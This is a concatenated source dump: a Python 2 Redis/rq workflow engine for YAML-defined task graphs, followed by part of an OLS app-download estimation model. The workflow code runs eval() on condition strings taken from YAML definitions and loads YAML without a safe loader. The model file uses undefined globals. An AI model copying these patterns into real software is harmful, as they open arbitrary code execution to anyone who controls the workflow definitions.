all_keys = r.hgetall(wf.status_id)
for k in all_keys:
if k.startswith('_lock_'):
r.hdel(wf.status_id, k)
def _clear_this_join_lock(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hdel(wf.status_id, '_lock_%s' % task_name)
def _get_exist_status_id(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
l = r.keys('*%s' % wf.id)
return None if not l else l[0]
def _set_running_flow_graph(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(
wf.status_id, '_graph', yaml.dump(wf.flow_graph)
)
r.hset(
wf.status_id, '_name', wf.flow_graph['name']
)
r.expire(wf.status_id, ONE_MONTH)
def _set_task_status(wf, task_name, status):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(wf.status_id, task_name, status)
def _set_task_running_time(wf, task_name, running_time):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(
wf.status_id, '%s_running_time' % task_name, running_time
)
def _get_task_status(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
s = r.hget(wf.status_id, task_name)
return int(s) if s else s
def _get_work_status(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
s = r.hget(wf.status_id, '_s')
return int(s) if s else s
def _set_work_status(wf, status):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(wf.status_id, '_s', status)
r.expire(wf.status_id, ONE_MONTH)
def _set_work_running_time(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
end_time = datetime.datetime.now()
r.hset(
wf.status_id, '_et', end_time.strftime('%Y-%m-%d %H:%M:%S')
)
start_time = r.hget(wf.status_id, '_st')
start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')
running_time = str(end_time - start_time)
r.hset(wf.status_id, '_rt', running_time)
def _any_failed_tasks(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
all_keys = r.hgetall(wf.status_id)
for k, v in all_keys.iteritems():
if not k.startswith('_') and not k.endswith('_running_time'):
tf = wf.flow_graph.get(k, {})
if int(v) == Status.FAILED and k != task_name and tf.get('node_type') != 'join':
return True
return False
def _all_tasks_success(wf, exclude_tasks=None):
for k, tf in wf.flow_graph.iteritems():
if isinstance(exclude_tasks, list) and k in exclude_tasks:
continue
if k.startswith('_') or k.endswith('_running_time') or k in WorkFlow.NON_NODE_NAMES or k == 'start':
continue
tf = wf.flow_graph.get(k, {})
if _get_task_status(wf, k) not in (Status.SUCCESS, Status.WONT_RUN) and tf.get('node_type') != 'join':
return False
return True
def _launch_multi_tasks(wf, next_task_list, current_task_status=Status.SUCCESS):
for task_name in next_task_list:
task_def = wf.flow_graph.get(task_name)
_launch_one_task(wf, task_name, task_def, current_task_status)
def _launch_one_task(wf, task_name, task_def, current_task_status=Status.SUCCESS):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf.rq_settings import QUEUES
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
if task_name == 'end':
if _any_failed_tasks(wf, 'end'):
_set_work_status(wf, Status.FAILED)
else:
_set_work_status(wf, Status.SUCCESS)
_set_work_running_time(wf)
log(
wf,
'End workflow: %s, id: %s' % (wf.flow_graph.get('name'), wf.id)
)
return
if not _any_failed_tasks(wf, task_name):
_set_work_status(wf, Status.RUNNING)
node_type = task_def['node_type']
queue = Queue(name=QUEUES[0], connection=r)
if node_type == 'task':
args = []
kwargs = {}
if isinstance(task_def.get('script_params', []), list):
args = task_def.get('script_params', [])
else:
kwargs = task_def.get('script_params', {})
alert_on_fail = task_def.get('alert_on_fail', False)
if current_task_status == Status.WONT_RUN:
_set_task_status(wf, task_name, Status.WONT_RUN)
queue.enqueue_call(queue_task, args=(
wf,
task_name, task_def.get('script_type'),
task_def.get('script_path'),
task_def.get('schedule_time', 'D'),
args, kwargs, True, alert_on_fail
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'join' and is_join_executable(wf, task_name):
queue.enqueue_call(queue_join, args=(
wf, task_name, task_def.get('wait')
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'workflow':
queue.enqueue_call(queue_workflow, args=(
wf, task_name, task_def,
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
def _launch_next_task(wf, current_task_name, current_task_status, task_output=None):
if current_task_status == Status.FAILED:
_set_work_status(wf, Status.FAILED)
_set_work_running_time(wf)
return
current_task_def = wf.flow_graph.get(current_task_name)
next_tasks = current_task_def.get('next')
if isinstance(next_tasks, list):
_launch_multi_tasks(wf, next_tasks, current_task_status)
elif isinstance(next_tasks, dict):
_true_condition = task_output if next_tasks.get(task_output) else 'default'
for _task_condition, _next_tasks in next_tasks.iteritems():
if _task_condition == _true_condition:
_task_status = Status.WONT_RUN if current_task_status == Status.WONT_RUN else Status.SUCCESS
else:
_task_status = Status.WONT_RUN
if isinstance(_next_tasks, list):
_launch_multi_tasks(wf, _next_tasks, _task_status)
else:
_next_task_def = wf.flow_graph.get(_next_tasks, {})
_launch_one_task(wf, _next_tasks, _next_task_def, _task_status)
else:
next_task_def = wf.flow_graph.get(next_tasks, {})
_launch_one_task(wf, next_tasks, next_task_def, current_task_status)
def _decide_schedule_time(wf, schedule_time):
running_time = _get_work_start_time(wf)
should_run = True
if schedule_time.startswith('W'):
week_day = schedule_time.split(':')[1]
if running_time.weekday() + 1 != int(week_day):
should_run = False
if schedule_time.startswith('M'):
month_day = schedule_time.split(':')[1]
if running_time.day != int(month_day):
should_run = False
return should_run
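# schedule_time strings understood by _decide_schedule_time (anything else,
# e.g. the default 'D', runs every day):
#   'D'    -> run daily
#   'W:3'  -> run only when the workflow start day is Wednesday (Monday == 1)
#   'M:15' -> run only on the 15th day of the month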
def _acquire_join_lock(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
if r.hincrby(wf.status_id, '_lock_' + task_name) == 1:
return True
else:
return False
def _get_all_previous_nodes(wf, task_name, nodes=None):
# avoid a shared mutable default argument; callers may still pass their own set
if nodes is None:
nodes = set()
for node, node_def in wf.flow_graph.iteritems():
if node in WorkFlow.NON_NODE_NAMES:
continue
nexts = node_def.get('next', [])
if not isinstance(nexts, list):
nexts = [nexts]
for t in nexts:
if t == task_name:
nodes.add(node)
_get_all_previous_nodes(wf, node, nodes)
def _any_failed_waiting_tasks(wf, waiting_list):
for t in waiting_list:
if _get_task_status(wf, t) == Status.FAILED:
return True
nodes = set()
_get_all_previous_nodes(wf, t, nodes)
for pt in nodes:
if _get_task_status(wf, pt) == Status.FAILED:
return True
return False
def _any_running_waiting_tasks(wf, waiting_list):
for t in waiting_list:
nodes = set()
_get_all_previous_nodes(wf, t, nodes)
for pt in nodes:
if _get_task_status(wf, pt) == Status.RUNNING:
return True
return False
def valid_graph(flow_graph):
def find_not_pointed_node(graph):
for nn, ll in graph.iteritems():
if len(ll) == 0:
return nn
return None
is_succeed, msg, flow_graph = preload_graph(flow_graph)
if not is_succeed:
return False, msg, flow_graph
tmp_graph = {}
for node, node_def in flow_graph.iteritems():
if node in WorkFlow.NON_NODE_NAMES:
continue
if not isinstance(node_def, dict):
return False, 'Node %s definition should be a dict.' % node, flow_graph
if node != 'start' and 'node_type' not in node_def:
return False, 'Node %s has not node type.' % node, flow_graph
if not node_def.get('next'):
return False, 'Node %s has not next task(s).' % node, flow_graph
if node_def.get('node_type', 'start') not in WorkFlow.NODE_REQUIRED_PARAMS:
return False, 'Node %s: Unknown node type.' % node, flow_graph
for p in WorkFlow.NODE_REQUIRED_PARAMS[node_def.get('node_type', 'start')]:
if p not in node_def:
return False, 'Node %s miss key configuration.' % node, flow_graph
tmp_graph.setdefault(node, [])
next_list = []
if isinstance(node_def['next'], list):
next_list = node_def['next']
elif isinstance(node_def['next'], dict):
if node_def.get('node_type') != 'task':
return False, 'Node %s cannot use conditional next node, only task node can use.' % node, flow_graph
if 'default' not in node_def['next']:
return False, 'Node %s should have a "default" node in its next nodes dictionary.' % node, flow_graph
for _next_nodes in node_def['next'].values():
if isinstance(_next_nodes, list):
next_list.extend(_next_nodes)
else:
next_list.append(_next_nodes)
else:
if node_def['next'] != 'end':
next_list = [node_def['next']]
for n in next_list:
if n not in flow_graph:
return False, 'Unknown node: %s' % n, flow_graph
l = tmp_graph.setdefault(n, [])
l.append(node)
for n, l in tmp_graph.iteritems():
if len(l) > 1 and flow_graph[n].get('node_type') != 'join':
return False, '%s, Must use join to join multi tasks.' % n, flow_graph
while find_not_pointed_node(tmp_graph) is not None:
not_pointed_node = find_not_pointed_node(tmp_graph)
del tmp_graph[not_pointed_node]
for left_node in tmp_graph:
if not_pointed_node in tmp_graph[left_node]:
tmp_graph[left_node].remove(not_pointed_node)
if tmp_graph:
return False, 'Workflow graph exists loop.', flow_graph
return True, '', flow_graph
def preload_graph(flow_graph):
def _remove_null_wait_in_join_nodes(flow_graph):
for node in flow_graph:
node_def = flow_graph[node]
if isinstance(node_def, dict) and node_def.get('node_type') == 'join':
node_def['wait'] = [node for node in node_def['wait'] if node in flow_graph]
def _valid_decision_node(flow_graph, prev_node, node, node_def):
if 'switch' not in node_def or not isinstance(node_def.get('switch'), list):
return False, 'Decision node %s should have a list of cases in its "switch" field.' % node, None
has_default = False
next_nodes = None
for case in node_def.get('switch'):
if 'default' in case:
has_default = True
next_nodes = next_nodes or case.get('next')
if next_nodes is None:
return False, 'Decision node %s doesn\'t have next task(s) in its default condition.' % node, None
elif eval(case.get('case')):
next_nodes = next_nodes or case.get('next')
if next_nodes is None:
return False, 'Decision node %s doesn\'t have next task(s) in its case(s).' % node, None
if not has_default:
return False, 'Decision node %s doesn\'t have default condition.' % node, None
is_succeed, msg = _modify_join_nodes(flow_graph, prev_node, node, next_nodes)
if not is_succeed:
return is_succeed, msg, None
is_succeed, msg = _replace_decision_nodes(running_graph, node, next_nodes)
if not is_succeed:
return is_succeed, msg, None
return True, 'OK', next_nodes
def _modify_join_nodes(flow_graph, prev_node, node, next_nodes):
'''
replace the "wait" key if node type of next node is "join"
'''
if isinstance(next_nodes, list):
for _next_node in next_nodes:
if _next_node not in flow_graph:
return False, 'Unknown node: %s' % _next_node
_next_node_def = flow_graph[_next_node]
if _next_node_def.get('node_type') == 'join':
if 'wait' not in _next_node_def:
return False, 'Node %s miss key configuration "wait".' % _next_node
if node not in _next_node_def['wait']:
return False, 'Join node %s miss decision node %s in wait list.' % (_next_node, node)
_next_node_def['wait'].remove(node)
_next_node_def['wait'].append(prev_node)
elif isinstance(next_nodes, dict):
return False, '"decision" node %s cannot use "conditional" next.' % node
else:
if next_nodes not in flow_graph:
return False, 'Unknown node: %s' % next_nodes
_next_node_def = flow_graph[next_nodes]
if _next_node_def.get('node_type') == 'join':
if 'wait' not in _next_node_def:
return False, 'Node %s miss key configuration "wait".' % next_nodes
if node not in _next_node_def['wait']:
return False, 'Join node %s miss decision node %s in wait list.' % (next_nodes, node)
_next_node_def['wait'].remove(node)
_next_node_def['wait'].append(prev_node)
return True, 'OK'
def _replace_decision_nodes(running_graph, node, next_nodes):
'''
replace "decision" nodes to their "next" nodes in the running_graph
'''
for running_node in running_graph:
running_node_def = running_graph[running_node]
if running_node in WorkFlow.NON_NODE_NAMES:
continue
running_next_nodes = running_node_def.get('next')
if node == running_next_nodes:
running_node_def['next'] = next_nodes
elif isinstance(running_next_nodes, list) and node in running_next_nodes:
running_next_nodes.remove(node)
if isinstance(next_nodes, list):
running_next_nodes.extend(next_nodes)
else:
running_next_nodes.append(next_nodes)
running_node_def['next'] = list(set(running_next_nodes))
return True, 'OK'
def _dequeue(running_nodes_queue):
return running_nodes_queue.get()
def _enqueue(running_nodes_queue, node, next_nodes):
if isinstance(next_nodes, list):
for _next_node in next_nodes:
running_nodes_queue.put((node, _next_node))
elif isinstance(next_nodes, dict):
for _next_nodes in next_nodes.values():
if isinstance(_next_nodes, list):
for _node in _next_nodes:
running_nodes_queue.put((node, _node))
else:
running_nodes_queue.put((node, _next_nodes))
elif next_nodes != 'end':
running_nodes_queue.put((node, next_nodes))
running_graph = {'name': flow_graph.get('name')}
running_nodes_queue = PriorityQueue()
running_nodes_queue.put((None, "start"))
while not running_nodes_queue.empty():
prev_node, node = _dequeue(running_nodes_queue)
node_def = flow_graph.get(node)
if node_def is None:
return False, 'Unknown node: %s' % node, None
if node_def.get('node_type') == 'decision':
is_succeed, msg, next_nodes = _valid_decision_node(flow_graph, prev_node, node, node_def)
if not is_succeed:
return is_succeed, msg, None
else:
running_graph[node] = node_def
next_nodes = node_def.get('next')
_enqueue(running_nodes_queue, node, next_nodes)
_remove_null_wait_in_join_nodes(running_graph)
return True, '', running_graph
def load_flow_graph(yaml_path, params):
yaml_content = open(yaml_path, 'r').read() % params
flow_graph = yaml.load(yaml_content)
return flow_graph
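# A minimal YAML definition that passes valid_graph (illustrative only; node
# names and the script path are hypothetical):
#
#   name: demo_flow
#   start:
#     next: task_a
#   task_a:
#     node_type: task
#     script_type: python
#     script_path: scripts/do_work.py
#     script_params: []
#     next: end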
def _set_yaml_content(wf, yaml_content):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(wf.status_id, '_yaml_content', yaml_content)
r.expire(wf.status_id, ONE_MONTH)
def queue_task(wf, task_name, script_type, script_path, schedule_time, args, kwargs,
launch_next=True, alert_on_fail=False):
WorkFlow.task(wf, task_name, script_type, script_path, schedule_time, args, kwargs, launch_next, alert_on_fail)
def queue_join(wf, task_name, waiting_list):
WorkFlow.join(wf, task_name, waiting_list)
def queue_workflow(wf, task_name, task_def, launch_next=True):
WorkFlow.workflow(
wf, task_name, task_def.get('def_file'), task_def.get('async', True),
task_def.get('params', {}), launch_next
)
def is_join_executable(wf, task_name):
if _get_task_status(wf, task_name) == Status.RUNNING:
return False
if not _acquire_join_lock(wf, task_name):
return False
return True
class WorkFlow(object):
"""
Running a workflow.
- Use redis for sync task status.
- Each task finished then start next task.
- Support multi task launch.
- Support join primitive.
- Support sub-workflow.
"""
NON_NODE_NAMES = ('name', )
NODE_REQUIRED_PARAMS = {
'start': (),
'task': ('script_type', 'script_path', 'script_params'),
'join': ('wait', ),
'decision': ('switch', ),
'workflow': ('def_file', 'params')
}
flow_graph = {}
id = None
flow_status = Status.SUCCESS
status_id = None
def __init__(self, redis_host, redis_port, yaml_path=None, params={}, workflow_id=None):
self.redis_host = redis_host
self.redis_port = redis_port
if not workflow_id:
yaml_content = open(yaml_path, 'r').read()
self.flow_graph = yaml.load(yaml_content % params)
check_status, msg, self.flow_graph = valid_graph(self.flow_graph)
if not check_status:
raise Exception(msg)
self.id = str(uuid.uuid1())
self.status_id = 'workflow:%s:%s:%s' % (
datetime.date.today().strftime('%Y-%m-%d'),
slugify(self.flow_graph['name']),
self.id
)
_set_running_flow_graph(self)
else:
r = redis.Redis(host=self.redis_host, port=self.redis_port)
self.id = workflow_id
self.status_id = _get_exist_status_id(self)
if not self.status_id:
raise Exception('Workflow not exists')
self.flow_graph = yaml.load(r.hget(self.status_id, '_graph'))
yaml_content = r.hget(self.status_id, '_yaml_content')
if params:
self.flow_graph = yaml.load(yaml_content % params)
_set_running_flow_graph(self)
_set_yaml_content(self, yaml_content)
@staticmethod
def run_single_task(yaml_path, params, task_name):
flow_graph = load_flow_graph(yaml_path, params)
check_status, msg, flow_graph = valid_graph(flow_graph)
if not check_status:
raise Exception(msg)
if task_name not in flow_graph or flow_graph[task_name]['node_type'] != 'task':
return -1, 'Task not found or task type is invalid.'
task_def = flow_graph.get(task_name)
args = []
kwargs = {}
if isinstance(task_def.get('script_params', []), list):
args = task_def.get('script_params', [])
else:
kwargs = task_def.get('script_params', {})
script_type = task_def.get('script_type')
executor = Executor.get_executor(script_type)
script_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../..',
task_def.get('script_path')
)
executor = executor(script_path, alert_on_fail=False, script_type=script_type)
return executor.run(*args, **kwargs)
@staticmethod
def rerun_one_task(redis_host, redis_port, workflow_id, task_name, launch_next=False):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf.rq_settings import QUEUES
r = redis.Redis(host=redis_host, port=redis_port)
queue = Queue(name=QUEUES[0], connection=r)
wf = WorkFlow(redis_host, redis_port, workflow_id=workflow_id)
if _get_task_status(wf, task_name) == Status.RUNNING:
return ErrorNumber.TASK_IS_RUNNING, 'Task %s is running now.' % task_name
if not _any_failed_tasks(wf, task_name):
_set_work_status(wf, Status.RUNNING)
task_def = wf.flow_graph.get(task_name)
_clear_join_lock(wf)
node_type = task_def['node_type']
if node_type == 'task':
args = []
kwargs = {}
if isinstance(task_def.get('script_params', []), list):
args = task_def.get('script_params', [])
else:
kwargs = task_def.get('script_params', {})
alert_on_fail = task_def.get('alert_on_fail', False)
queue.enqueue_call(queue_task, args=(
wf,
task_name, task_def.get('script_type'),
task_def.get('script_path'),
task_def.get('schedule_time', 'D'),
args, kwargs, launch_next, alert_on_fail
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'join' and is_join_executable(wf, task_name):
queue.enqueue_call(queue_join, args=(
wf, task_name, task_def.get('wait')
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'workflow':
queue.enqueue_call(queue_workflow, args=(
wf, task_name, task_def, launch_next
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
@staticmethod
def rerun_workflow(redis_host, redis_port, workflow_id, params={}):
wf = WorkFlow(redis_host, redis_port, params=params, workflow_id=workflow_id)
if _get_work_status(wf) == Status.RUNNING:
return ErrorNumber.WORKFLOW_IS_RUNNING, 'Workflow is running now.'
WorkFlow.start(wf)
@staticmethod
def task(wf, task_name, script_type, script_path, schedule_time, args, kwargs,
launch_next=True, alert_on_fail=False):
if _get_task_status(wf, task_name) == Status.RUNNING:
return
if _get_task_status(wf, task_name) == Status.WONT_RUN:
if launch_next:
_launch_next_task(wf, task_name, Status.WONT_RUN)
elif _all_tasks_success(wf):
_set_work_status(wf, Status.SUCCESS)
return
this_status = Status.RUNNING
_set_task_status(wf, task_name, this_status)
this_status = Status.SUCCESS
if not _decide_schedule_time(wf, schedule_time):
_set_task_status(wf, task_name, this_status)
log(wf, 'Task(%s) is not on schedule date, skip.' % task_name)
_launch_next_task(wf, task_name, this_status)
return
start_time = datetime.datetime.now()
try:
log(wf, 'Running task: %s' % task_name)
executor = Executor.get_executor(script_type)
script_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../..', script_path
)
executor = executor(script_path, alert_on_fail=alert_on_fail, script_type=script_type)
status, output = executor.run(*args, **kwargs)
except:
status = ErrorNumber.RUNNING_ERROR
output = traceback.format_exc()
end_time = datetime.datetime.now()
running_time = str(end_time - start_time)
if status != 0:
log(wf, output)
this_status = Status.FAILED
if launch_next:
_launch_next_task(wf, task_name, this_status, output)
elif _all_tasks_success(wf, [task_name]) and this_status == Status.SUCCESS:
_set_work_status(wf, Status.SUCCESS)
_set_task_status(wf, task_name, this_status)
_set_task_running_time(wf, task_name, running_time)
log(
wf,
'End task: %s, status: %s' % (task_name, STATUS_LABEL[this_status])
)
@staticmethod
def join(wf, task_name, waiting_list):
_set_task_status(wf, task_name, Status.RUNNING)
while True:
if _any_failed_waiting_tasks(wf, waiting_list):
_set_task_status(wf, task_name, Status.SUCCESS)
_clear_this_join_lock(wf, task_name)
return
all_status = map(lambda x: _get_task_status(wf, x), waiting_list)
if None in all_status:
time.sleep(10)
continue
# SUCCESS = 0b001, RUNNING = 0b010, WONT_RUN = 0b100
union_status = reduce(lambda x, y: x | y, all_status)
if union_status & Status.RUNNING == Status.RUNNING:
time.sleep(10)
else:
_launch_next_task(wf, task_name, union_status & Status.SUCCESS or union_status & Status.WONT_RUN)
_set_task_status(wf, task_name, Status.SUCCESS)
_clear_this_join_lock(wf, task_name)
break
@staticmethod
def workflow(wf, task_name, def_file, async, params, launch_next=True):
if _get_task_status(wf, task_name) == Status.RUNNING:
return
this_status = Status.RUNNING
_set_task_status(wf, task_name, this_status)
this_status = Status.SUCCESS
start_time = datetime.datetime.now()
log(wf, 'Running task: %s' % task_name)
yaml_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../definitions', def_file
)
try:
wf_t = WorkFlow(wf.redis_host, wf.redis_port, yaml_path=yaml_path, params=params)
WorkFlow.start(wf_t)
if async:
this_status = Status.SUCCESS
else:
this_status = _get_work_status(wf_t)
while this_status is None or this_status == Status.RUNNING:
time.sleep(10)
this_status = _get_work_status(wf_t)
except:
this_status = Status.FAILED
output = traceback.format_exc()
log(wf, output)
end_time = datetime.datetime.now()
running_time = str(end_time - start_time)
if launch_next:
_launch_next_task(wf, task_name, this_status)
_set_task_status(wf, task_name, this_status)
_set_task_running_time(wf, task_name, running_time)
log(
wf,
'End task: %s, status: %s' % (task_name, STATUS_LABEL[this_status])
)
@staticmethod
def start(wf):
start_time = datetime.datetime.now()
_clear_status(wf)
log(
wf,
'Start workflow: %s, id: %s' % (wf.flow_graph.get('name'), wf.id)
)
_set_work_status(wf, Status.RUNNING)
_set_work_start_time(wf, start_time)
_set_task_status(wf, 'start', Status.SUCCESS)
_launch_next_task(wf, 'start', Status.SUCCESS)
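# Minimal driver sketch (redis host/port, yaml path and params are assumptions):
#
#   wf = WorkFlow('localhost', 6379, yaml_path='definitions/demo_flow.yaml', params={})
#   WorkFlow.start(wf)
#   # progress can then be polled from redis via _get_work_status(wf)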
<file_sep>/betty_benchmark_android/model_apv2.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Betty, fixed 14d training time, OLS
#
##
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
import os
import config
#import operator
#import math
import csv
#import statsmodels.formula.api as sm
import statsmodels.regression.linear_model as sm
#import statsmodels.api as sm
#from sklearn.svm import SVR
import numpy as np
#from rpy import *
import datetime as dt
from sklearn.cross_validation import KFold
#from sklearn.cross_validation import StratifiedKFold
import bz2
result = None
gres = []
feed_market_format = { 0: 'Free',
1: 'Paid',
2: 'Grossing',
}
def fun(x):
if np.isnan(x):
return 0
else:
return 1/pow(float(x),2 )
def wavg(group):
d = group['t1e']
w = group['nb_obs']
return (d * w).sum() / w.sum()
def preprocess_metadata(df):
df['est'] = df['est'].fillna(0)
#df['ipad_estimate'] = df['ipad_estimate'].fillna(0)
df['actual_log']=np.log(df['actual'])
df['Daily.Estimate']=df['est']
del df['est']
df['r_log']=np.log(df['rank']+1.0)
df['r_inv']=1.0/df['rank']
df['weekday'] = df['date'].apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%d').weekday())
df['isMon'] = 0
df['isTue'] = 0
df['isWed'] = 0
df['isThu'] = 0
df['isFri'] = 0
df['isSat'] = 0
df['isSun'] = 0
df.loc[df['weekday'] == 0, 'isMon'] = 1
df.loc[df['weekday'] == 1, 'isTue'] = 1
df.loc[df['weekday'] == 2, 'isWed'] = 1
df.loc[df['weekday'] == 3, 'isThu'] = 1
df.loc[df['weekday'] == 4, 'isFri'] = 1
df.loc[df['weekday'] == 5, 'isSat'] = 1
df.loc[df['weekday'] == 6, 'isSun'] = 1
#df['wt_rank_iphone'] = 0.01
#df['wt_rank_ipad'] = 0.01
#df['wt_rank_iphone'][df['iphone_rank'] <= 20] = 1
#df['wt_rank_ipad'][df['ipad_rank'] <= 20] = 1
#df['wt_rank_iphone'] = 1.0/df['iphone_rank']
#df['wt_rank_ipad'] = 1.0/df['ipad_rank']
#df['wt_rank_iphone'] = df['wt_rank_iphone'].fillna(0)
#df['wt_rank_ipad'] = df['wt_rank_ipad'].fillna(0)
#df['wt_rank'] = df['wt_rank_iphone'] + df['wt_rank_ipad']
#df['wt_perc'] = 1.0 / df['actual']
#del df['wt_rank_iphone']
#del df['wt_rank_ipad']
df = df.drop_duplicates()
return df
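# Feature sketch: with r_log = log(rank + 1) and r_inv = 1/rank built above, the
# OLS in regression() fits
#   log(actual) ~ r_log + r_inv + weekday dummies
# and predictions are mapped back to unit scale with np.exp(...).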
def regression(df, fdate, ldate):
startdate = fdate
enddate = ldate
gres = []
#app_ids = []
for n, g in df.groupby(['category_id', 'feed_id']):
dates = g['date'].drop_duplicates()
for date in dates:
if (date > enddate) or (date < startdate):
continue
print n, date
df_obs_7d = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=7)).isoformat() )]
df_obs_14d = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=14)).isoformat() )]
#print('universal')
#traina = df_obs_7d[((np.isnan(df_obs_7d['r_log']) == False) & (np.isnan(df_obs_7d['actual_log']) == False) & (np.isnan(df_obs_7d['has_event_flag']) == True))]
#df_obs = df_obs_7d[((np.isnan(df_obs_7d['r_log']) == False))]
#trainday = 7
#if ( len(traina) < 100):
traina = df_obs_14d[((np.isnan(df_obs_14d['r_log']) == False) & (np.isnan(df_obs_14d['actual_log']) == False) & (np.isnan(df_obs_14d['has_event_flag']) == True))]
df_obs = df_obs_14d[((np.isnan(df_obs_14d['r_log']) == False))]
trainday = 14
test_outa = []
if ( len(traina) > 20):
app_ids = df_obs[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
traina = traina.reset_index()
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
for tr, te in kf:
train = traina[traina['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
#traina = train[((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual_log']) == False) & (np.isnan(train['has_event_flag']) == True))]
test = test[(np.isnan(test['r_log']) == False) & (test['date'] == date)]
try:
model_ra = (sm.OLS.from_formula(formula ='actual_log ~ r_log + r_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun',
data = train))
fitted_ra = model_ra.fit()
test['tae'] = np.exp(fitted_ra.predict(test[['r_log', 'r_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
#train['tae'] = np.exp(fitted_ra.predict(train[['r_log', 'r_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
#train['score'] = 1.0 / (abs((train['tae'] / train['actual']) - 1.0) * train['rank'] + 1.0)
#test['cg_score'] = train['score'].sum(1)
test['train_day'] = trainday
except:
test['tae'] = float(np.nan)
#test['cg_score'] = float(np.nan)
test['train_day'] = trainday
test_outa.append(test)
test_outa = pd.concat(test_outa)
else:
test_outa = df_obs[df_obs['date'] == date]
test_outa['tae'] = float(np.nan)
test_outa['cg_score'] = float(np.nan)
test_outa['train_day'] = float(np.nan)
#print test_out1.columns
test_outa = test_outa[['app_id', 'category_id', 'date', 'feed_id', 'tae', 'train_day']]
result = g[g['date'] == date]
#result['nb_obs'] = df_obs['actual'].dropna().shape[0]
result = result.merge(test_outa, on=['app_id', 'category_id', 'date', 'feed_id'], how='left')
gres.append(result)
if (gres == []):
return pd.DataFrame()
gres = pd.concat(gres)
#gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t1e'])
#gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t2e'])
#gres['cg_score'] = gres['cg_score'].where(np.isnan(gres['cg_score']) == False, gres['cg_score_x'])
#gres['cg_score'] = gres['cg_score'].where(np.isnan(gres['cg_score']) == False, gres['cg_score_y'])
#gres['train_day'] = gres['train_day'].where(np.isnan(gres['train_day']) == False, gres['train_day_x'])
#gres['train_day'] = gres['train_day'].where(np.isnan(gres['train_day']) == False, gres['train_day_y'])
#del gres['t1e']
#del gres['cg_score_x']
#del gres['train_day_x']
#del gres['t2e']
#del gres['cg_score_y']
#del gres['train_day_y']
#print gres.dtypes()
gres.to_csv('res_stg_%s_%s_%s.csv'%(store_id, store_name, ver), index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres
def gene_final(df):
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
gres_final['sbe_rel_error'] = (gres_final['Daily.Estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
#gres_final['t12e_rel_error'] = (gres_final['t1e+t2e'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.to_csv('res%s%s.csv'%(store_id,ver), index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def gene_final_byscore(df):
#actuals_df = df[['store_id', 'date', 'feed_id', 'app_id', 'actual']].drop_duplicates()
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
df['loginv_abs_error'] = (df['tae'] - df['actual']).abs()
df['loginv_rel_error'] = df['loginv_abs_error'] / df['actual']
df['score'] = 0.0
df['score'] = 1.0 / ((df['rank'] * df['loginv_rel_error']) + 1.0)
#df['score'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)
#df['score'][(np.isnan(df['iphone_rank'])==False) &
# (np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)))/2.0
scores = df.groupby(['store_id', 'feed_id', 'category_id', 'date']).sum().reset_index()
scores = scores[['store_id', 'feed_id', 'category_id', 'date', 'score']]
scores.rename(columns={'score':'cg_score'}, inplace=True)
del df['score']
#loginv_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).mean().reset_index()
